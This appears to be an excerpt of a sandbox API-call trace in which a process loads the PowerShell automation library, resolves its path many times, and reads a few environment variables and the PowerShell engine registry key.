	[0847.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.718] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0847.718] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0847.718] CoTaskMemFree (pv=0x3cbb20) 
	[0847.718] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0847.718] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0847.718] CoTaskMemFree (pv=0x3cbb20) 
	[0847.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.721] GetCurrentProcessId () returned 0xfe0
	[0847.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.726] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad898 | out: phkResult=0x1ad898*=0x394) returned 0x0
	[0847.726] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad81c, lpData=0x0, lpcbData=0x1ad818*=0x0 | out: lpType=0x1ad81c*=0x1, lpData=0x0, lpcbData=0x1ad818*=0x56) returned 0x0
	[0847.726] CoTaskMemAlloc (cb=0x5a) returned 0x1b826a20
	[0847.726] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad7ec, lpData=0x1b826a20, lpcbData=0x1ad7e8*=0x56 | out: lpType=0x1ad7ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad7e8*=0x56) returned 0x0
	[0847.726] CoTaskMemFree (pv=0x1b826a20) 
	[0847.726] RegCloseKey (hKey=0x394) returned 0x0
	[0847.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.735] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0847.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.735] CoTaskMemFree (pv=0x3cbb20) 
	[0847.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
